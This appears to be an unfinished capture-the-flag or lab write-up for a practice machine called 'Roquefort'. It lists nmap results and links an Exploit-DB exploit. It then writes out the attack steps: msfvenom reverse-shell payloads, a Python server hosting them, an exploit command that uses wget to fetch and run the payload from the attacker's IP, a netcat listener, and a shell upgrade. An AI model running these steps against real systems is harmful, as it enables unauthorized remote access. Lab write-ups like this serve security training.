# Roquefort (WIP)

## Nmap

```
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5b
22/tcp   open   ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp   closed domain
2222/tcp open   ssh     Dropbear sshd 2016.74 (protocol 2.0)
3000/tcp open   ppp?
```

## HTTP

{% embed url="<https://www.exploit-db.com/exploits/49383>" %}

msfvenom:

```
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.49.196 LPORT=2222 -f raw > shell.sh
```

Host on:

```
sudo python2 -m SimpleHTTPServer 21
```

First run:

```
USERNAME = "test"
PASSWORD = "Password"
HOST_ADDR = '192.168.49.196'
HOST_PORT = 3000
URL = 'http://192.168.196.67:3000'                                                                                                                                                                          
CMD = 'wget http://192.168.49.196:21/shell.sh && bash shell.sh' 
```

Listener:

```
sudo nc -lvp 2222
```

A shell should establish on our listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f0328c9d421ada2c262aae1322d2efe763426f88%2Fimage.png?alt=media)

upgrade the shell.

```
/usr/bin/script -qc /bin/bash /dev/null
```

```
msfvenom -p linux/x64/shell_reverse_tcp RHOST=192.168.49.196 LPORT=2222 -f elf > run-parts
```